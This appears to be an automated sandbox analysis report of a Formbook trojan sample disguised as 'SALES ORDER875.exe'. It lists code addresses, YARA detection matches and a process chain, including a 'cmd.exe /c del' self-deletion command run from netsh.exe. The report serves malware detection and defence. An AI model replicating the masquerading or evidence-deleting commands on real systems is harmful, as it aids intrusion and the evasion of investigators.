          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00EC1D5A4_2_00EC1D5A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E19EB04_2_00E19EB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00DD3FD54_2_00DD3FD5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00DD3FD24_2_00DD3FD2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECFFB14_2_00ECFFB1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00E11F924_2_00E11F92
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00ECFF094_2_00ECFF09
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_01565EB04_2_01565EB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001D10304_2_001D1030
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001EC3F24_2_001EC3F2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001EE79D4_2_001EE79D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001D2D904_2_001D2D90
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001D9E504_2_001D9E50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001D9E4C4_2_001D9E4C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_001D2FB04_2_001D2FB0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C2A0364_2_00C2A036
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C210824_2_00C21082
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C289124_2_00C28912
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C2B2324_2_00C2B232
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C25B324_2_00C25B32
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C25B304_2_00C25B30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C2E5CD4_2_00C2E5CD
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 4_2_00C22D024_2_00C22D02
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: String function: 003A0A30 appears 46 times
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: String function: 0039F9F2 appears 31 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 107 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 103 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00E7EA12 appears 86 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00E45130 appears 58 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00E8F290 appears 103 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00DFB970 appears 262 times
          Source: C:\Windows\SysWOW64\netsh.exeCode function: String function: 00E57E54 appears 99 times
          Source: SALES ORDER875.exe, 00000000.00000003.1820842673.00000000042E3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SALES ORDER875.exe
          Source: SALES ORDER875.exe, 00000000.00000003.1828487375.000000000448D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SALES ORDER875.exe
          Source: SALES ORDER875.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.6b0000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SALES ORDER875.exe.2340000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SALES ORDER875.exe.2340000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4124920837.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4125151354.0000000000600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1898494781.0000000003100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1832217978.0000000002340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.4125211297.0000000000630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1898295736.0000000000870000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1898140559.00000000006B1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4140986795.000000000E678000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: Process Memory Space: SALES ORDER875.exe PID: 6380, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: netsh.exe PID: 7032, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@10/2
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F37B5 GetLastError,FormatMessageW,0_2_003F37B5
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003E10BF AdjustTokenPrivileges,CloseHandle,0_2_003E10BF
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003E16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_003E16C3
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_003F51CD
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_0040A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0040A67C
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003F648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_003F648E
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003842A2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6016:120:WilError_03
          Source: C:\Users\user\Desktop\SALES ORDER875.exeFile created: C:\Users\user\AppData\Local\Temp\beeishJump to behavior
          Source: SALES ORDER875.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SALES ORDER875.exeReversingLabs: Detection: 55%
          Source: unknownProcess created: C:\Users\user\Desktop\SALES ORDER875.exe "C:\Users\user\Desktop\SALES ORDER875.exe"
          Source: C:\Users\user\Desktop\SALES ORDER875.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SALES ORDER875.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SALES ORDER875.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SALES ORDER875.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\netsh.exe "C:\Windows\SysWOW64\netsh.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"Jump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SALES ORDER875.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mfsrcsnk.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32Jump to behavior
          Source: SALES ORDER875.exeStatic file information: File size 1396736 > 1048576
          Source: SALES ORDER875.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: SALES ORDER875.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: SALES ORDER875.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: SALES ORDER875.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: SALES ORDER875.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: SALES ORDER875.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: SALES ORDER875.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: netsh.pdb source: svchost.exe, 00000001.00000002.1898626639.0000000003180000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897949965.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000002.4126745037.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: SALES ORDER875.exe, 00000000.00000003.1828189983.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, SALES ORDER875.exe, 00000000.00000003.1823570510.0000000004360000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1828434311.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1829990258.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.0000000003200000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1898449365.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000F6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1900238862.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: svchost.exe, 00000001.00000002.1898626639.0000000003180000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897949965.0000000002C2F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1897815254.0000000002C2C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126745037.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: SALES ORDER875.exe, 00000000.00000003.1828189983.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, SALES ORDER875.exe, 00000000.00000003.1823570510.0000000004360000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1828434311.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1829990258.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1898690077.0000000003200000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000004.00000003.1898449365.0000000000A5B000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000F6E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000004.00000003.1900238862.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4125785464.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.4141739239.0000000010D2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000004.00000002.4125249385.0000000000695000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126879168.000000000377F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.4141739239.0000000010D2F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000004.00000002.4125249385.0000000000695000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4126879168.000000000377F000.00000004.10000000.00040000.00000000.sdmp
          Source: SALES ORDER875.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: SALES ORDER875.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: SALES ORDER875.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: SALES ORDER875.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: SALES ORDER875.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_003842DE
          Source: C:\Users\user\Desktop\SALES ORDER875.exeCode function: 0_2_003A0A76 push ecx; ret 0_2_003A0A89
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320225F pushad ; ret 1_2_032027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032027FA pushad ; ret 1_2_032027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx1_2_032309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320283D push eax; iretd 1_2_03202858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320135E push eax; iretd 1_2_03201369
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006BE46D push ebx; retf 1_2_006BE470
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006CE530 push edi; ret 1_2_006CE532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_006C285C push cs; retf 1_2_006C285F
